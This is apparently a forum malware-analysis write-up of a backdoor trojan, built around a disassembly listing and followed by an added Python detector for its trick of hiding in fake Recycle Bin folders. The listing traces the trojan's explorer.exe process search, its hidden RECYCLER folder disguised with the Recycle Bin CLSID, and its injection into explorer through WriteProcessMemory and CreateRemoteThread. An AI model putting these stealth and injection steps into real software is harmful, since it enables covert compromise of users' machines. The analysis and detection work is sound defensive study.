004020B6 |. 81C1 4A090000 ADD ECX,94A
004020BC |. 51 PUSH ECX ;launch.exe
004020BD |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
004020C0 |. 52 PUSH EDX
004020C1 |. FF95 D0FDFFFF CALL DWORD PTR SS:[EBP-230] ; kernel32.lstrcmpiA
Continue:
00402104 |. 6A 00 PUSH 0
00402106 |. FF95 0CFEFFFF CALL DWORD PTR SS:[EBP-1F4] ;GetModuleHandle
0040210C |. 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
0040210F |. 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C]
00402112 |. 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C] ;e_lfanew -> PE header
00402115 |. 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C]
00402118 |. 8D8C02 F800000>LEA ECX,DWORD PTR DS:[EDX+EAX+F8] ;first section header (PE header + 0xF8 for a PE32 optional header)
0040211F |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
00402122 |> 8B95 B4FEFFFF /MOV EDX,DWORD PTR SS:[EBP-14C]
00402128 |. 81C2 6F0A0000 |ADD EDX,0A6F
0040212E |. 52 |PUSH EDX ; /Arg2 = 0041471F ASCII ".text"
0040212F |. 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4] ; |
00402132 |. 50 |PUSH EAX ; |Arg1
00402133 |. E8 F8140000 |CALL test.00403630 ; \test.00403630 this checks whether the first section is named .text and the second .data
00402138 |. 85C0 |TEST EAX,EAX ; probably to detect someone else modifying or packing it, since the sample has its own (admittedly weak) encryption :)
0040213A |. 74 0B |JE SHORT test.00402147
0040213C |. 8B4D FC |MOV ECX,DWORD PTR SS:[EBP-4]
0040213F |. 83C1 28 |ADD ECX,28
00402142 |. 894D FC |MOV DWORD PTR SS:[EBP-4],ECX
00402145 |.^EB DB \JMP SHORT test.00402122
00402147 |> 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
Continue downward until 402CB0 and F7 into it:
00402CB0 /$ 55 PUSH EBP
00402CB1 |. 8BEC MOV EBP,ESP
00402CB3 |. 81EC E0050000 SUB ESP,5E0
00402CB9 |. C785 28FAFFFF >MOV DWORD PTR SS:[EBP-5D8],0
00402CC3 |. C785 2CFAFFFF >MOV DWORD PTR SS:[EBP-5D4],0
00402CCD |> 83BD 28FAFFFF >/CMP DWORD PTR SS:[EBP-5D8],0
00402CD4 |. 75 3B |JNZ SHORT test.00402D11
00402CD6 |. 68 F4010000 |PUSH 1F4
00402CDB |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]
00402CDE |. 8B88 B8000000 |MOV ECX,DWORD PTR DS:[EAX+B8]
00402CE4 |. FFD1 |CALL ECX ; kernel32.Sleep
00402CE6 |. 8D95 2CFAFFFF |LEA EDX,DWORD PTR SS:[EBP-5D4]
00402CEC |. 52 |PUSH EDX ; /Arg3
00402CED |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8] ; |
00402CF0 |. 8B88 84010000 |MOV ECX,DWORD PTR DS:[EAX+184] ; |
00402CF6 |. 81C1 7C050000 |ADD ECX,57C ; |
00402CFC |. 51 |PUSH ECX ; |Arg2 explorer.exe (inject?)
00402CFD |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8] ; |
00402D00 |. 83C2 1C |ADD EDX,1C ; |
00402D03 |. 52 |PUSH EDX ; |Arg1
00402D04 |. E8 470D0000 |CALL test.00403A50 ; \test.00403A50 F7 in: it enumerates processes to find explorer.exe
00402D09 |. 8985 28FAFFFF |MOV DWORD PTR SS:[EBP-5D8],EAX
00402D0F |.^EB BC \JMP SHORT test.00402CCD
00402D11 |> 68 B4050000 PUSH 5B4 ; /Arg2 = 000005B4
00402D16 |. 8D85 38FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C8] ; |
00402D1C |. 50 PUSH EAX ; |Arg1
00402D1D |. E8 7E080000 CALL test.004035A0 ; \test.004035A0
00402D22 |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00402D25 |. 81C1 90010000 ADD ECX,190
00402D2B |. 51 PUSH ECX
00402D2C |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
00402D2F |. 8B82 94000000 MOV EAX,DWORD PTR DS:[EDX+94]
00402D35 |. FFD0 CALL EAX ; kernel32.lstrlenA
F8 straight down:
00402D5A |> 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402D5D |. 8B88 84010000 MOV ECX,DWORD PTR DS:[EAX+184]
00402D63 |. 81C1 9B050000 ADD ECX,59B
00402D69 |. 51 PUSH ECX
00402D6A |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
00402D6D |. 52 PUSH EDX
00402D6E |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402D71 |. 8B88 A0000000 MOV ECX,DWORD PTR DS:[EAX+A0]
00402D77 |. FFD1 CALL ECX ; kernel32.lstrcmpiA "\winlogon.exe"
.....................
00402D8D |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402D90 |. 8B88 CC000000 MOV ECX,DWORD PTR DS:[EAX+CC]
00402D96 |. FFD1 CALL ECX ; kernel32.GetSystemDirectoryA
..........................
00402DE8 |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00402DEB |. 8B91 BC000000 MOV EDX,DWORD PTR DS:[ECX+BC] ;c:\RECYCLER
00402DF1 |. FFD2 CALL EDX ; kernel32.CreateDirectoryA
00402DF3 |. 6A 07 PUSH 7
00402DF5 |. 8D85 B8FDFFFF LEA EAX,DWORD PTR SS:[EBP-248]
00402DFB |. 50 PUSH EAX
00402DFC |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00402DFF |. 8B91 C4000000 MOV EDX,DWORD PTR DS:[ECX+C4]
00402E05 |. FFD2 CALL EDX ; kernel32.SetFileAttributesA
.......
00402EA0 |> 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
00402EA3 |. C601 00 MOV BYTE PTR DS:[ECX],0
00402EA6 |. 6A 00 PUSH 0
00402EA8 |. 8D95 B8FDFFFF LEA EDX,DWORD PTR SS:[EBP-248]
00402EAE |. 52 PUSH EDX
00402EAF |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402EB2 |. 8B88 BC000000 MOV ECX,DWORD PTR DS:[EAX+BC] ;"C:\RECYCLER\S-1-5-21-2070133153-9860220472-701320982-5341"
00402EB8 |. FFD1 CALL ECX ; kernel32.CreateDirectoryA
..........
00402F0E |. 6A 00 PUSH 0
00402F10 |. 6A 06 PUSH 6
00402F12 |. 6A 02 PUSH 2
00402F14 |. 6A 00 PUSH 0
00402F16 |. 6A 00 PUSH 0
00402F18 |. 68 00000040 PUSH 40000000
00402F1D |. 8D95 BCFEFFFF LEA EDX,DWORD PTR SS:[EBP-144]
00402F23 |. 52 PUSH EDX
00402F24 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402F27 |. 8B48 50 MOV ECX,DWORD PTR DS:[EAX+50] ;C:\RECYCLER\S-1-5-21-2070133153-9860220472-701320982-5341\Desktop.ini
00402F2A |. FFD1 CALL ECX ; kernel32.CreateFileA
The content written is: ASCII "[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}". That CLSID is the Recycle Bin's, so Explorer displays the folder as a Recycle Bin and hides what is inside it; I have recently seen several trojans hide themselves this way. A legitimate per-user RECYCLER\S-1-5-... folder carries the same Desktop.ini, so the tell is not the CLSID by itself but the folder name (as listed here, the sub-authority 9860220472 does not fit in 32 bits, so it cannot be a real SID) and the file dropped inside.
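An added detection example for the hiding trick just described (Python, my code, not the post's): scan a RECYCLER directory and flag subfolders whose name is not a well-formed SID (sub-authorities are 32-bit values, so S-1-5-21-2070133153-9860220472-701320982-5341 cannot be real) or which contain executables beside the Recycle-Bin Desktop.ini. The demo tree, including the file name dropped.exe, is constructed; a real XP RECYCLER subfolder carries the same Desktop.ini, so the CLSID alone is not reported.

```python
"""Hunt for the hiding trick above: a SID-named folder under RECYCLER whose
Desktop.ini carries the Recycle Bin CLSID. Added example; the directory tree
built in build_demo_tree() is constructed, including the file name dropped.exe."""
import os
import tempfile

RECYCLE_BIN_CLSID = "{645FF040-5081-101B-9F08-00AA002F954E}"

def sid_is_wellformed(name):
    """S-1-<authority>-<sub>...: the identifier authority fits in 48 bits, each
    sub-authority in 32 bits, at most 15 of them. The sample's folder name
    has sub-authority 9860220472, which does not fit."""
    parts = name.split("-")
    if len(parts) < 4 or parts[0] != "S" or parts[1] != "1":
        return False
    if not all(p.isdigit() for p in parts[2:]):
        return False
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return authority < 2 ** 48 and len(subs) <= 15 and all(s < 2 ** 32 for s in subs)

def hides_as_recycle_bin(ini_path):
    """True if Desktop.ini makes Explorer treat the folder as the Recycle Bin."""
    try:
        with open(ini_path, "r", errors="replace") as f:
            text = f.read().lower()
    except OSError:
        return False
    return "[.shellclassinfo]" in text and RECYCLE_BIN_CLSID.lower() in text

def scan_recycler(root):
    """Return [(folder, [reasons])] for suspicious subfolders. A genuine per-user
    recycle folder also has the CLSID Desktop.ini, so that alone is not a finding;
    a malformed SID or executables inside are."""
    findings = []
    for name in sorted(os.listdir(root)):
        folder = os.path.join(root, name)
        if not os.path.isdir(folder):
            continue
        reasons = []
        if not sid_is_wellformed(name):
            reasons.append("malformed SID")
        exes = sorted(f for f in os.listdir(folder) if f.lower().endswith((".exe", ".dll")))
        if exes:
            reasons.append("executables: " + ", ".join(exes))
        if reasons and hides_as_recycle_bin(os.path.join(folder, "Desktop.ini")):
            reasons.append("Desktop.ini masquerades as Recycle Bin")
        if reasons:
            findings.append((name, reasons))
    return findings

def build_demo_tree():
    """Constructed sample: one legitimate-looking recycle folder, one as the sample creates it."""
    root = tempfile.mkdtemp(prefix="RECYCLER_")
    legit = os.path.join(root, "S-1-5-21-1234567890-1234567890-1234567890-500")
    bad = os.path.join(root, "S-1-5-21-2070133153-9860220472-701320982-5341")  # from the listing
    for d in (legit, bad):
        os.makedirs(d)
        with open(os.path.join(d, "Desktop.ini"), "w") as f:
            f.write("[.ShellClassInfo]\r\nCLSID=" + RECYCLE_BIN_CLSID + "\r\n")
    open(os.path.join(legit, "INFO2"), "wb").close()        # XP recycle-bin index file
    open(os.path.join(bad, "dropped.exe"), "wb").close()    # constructed file name
    return root

if __name__ == "__main__":
    for folder, reasons in scan_recycler(build_demo_tree()):
        print(folder, "->", "; ".join(reasons))
```

On a real system point scan_recycler at the RECYCLER directory of each volume (or of a mounted image); the SID of the real account can be cross-checked against the profile list, but the 32-bit sub-authority rule alone already catches the name this sample uses.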
Keep following until 4039F0 and F7 in (I gave the function a name in the IDB). This one writes code into explorer: the trojan uses the old but classic WriteProcessMemory approach for injection.
Only here did I notice that this injection code is very similar to the last trojan I analysed; could the author be the same person? So a large part of what follows is writing code into explorer.
So keep pressing F8 downward:
0040350D |. 51 PUSH ECX
0040350E |. 6A 00 PUSH 0
00403510 |. 8B95 24FAFFFF MOV EDX,DWORD PTR SS:[EBP-5DC]
00403516 |. 52 PUSH EDX
00403517 |. 8B85 20FAFFFF MOV EAX,DWORD PTR SS:[EBP-5E0]
0040351D |. 50 PUSH EAX
0040351E |. 6A 00 PUSH 0
00403520 |. 6A 00 PUSH 0
00403522 |. 8B8D 28FAFFFF MOV ECX,DWORD PTR SS:[EBP-5D8]
00403528 |. 51 PUSH ECX
00403529 |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
0040352C |. 8B82 90000000 MOV EAX,DWORD PTR DS:[EDX+90]
00403532 |. FFD0 CALL EAX ; kernel32.CreateRemoteThread look, the same old but classic injection method again.
Done! For the injection part you can also use what I mentioned at the end of
http://bbs.pediy.com/showthread.php?t=77523 : change the first byte of the CreateRemoteThread entry instruction to CC.
Closing words: malware analysis needs persistence and resolve. This post mainly dissects the trojan's execution flow; my writing skill is limited. It is mainly a backdoor type trojan: once infected, the backdoor connects to a remote host and the remote attacker can control your computer, which becomes, for example, an MSN spreading robot or a flood zombie. I will do follow-up analysis of this sample: a detailed look at how its backdoor behaviour is implemented, and at the things not yet dug out.
Discussion welcome.
The attachment contains the trojan sample and the IDB file from my analysis. Remember: never analyse or execute the sample on your own machine; it is highly dangerous. The archive is encrypted;
default password: infected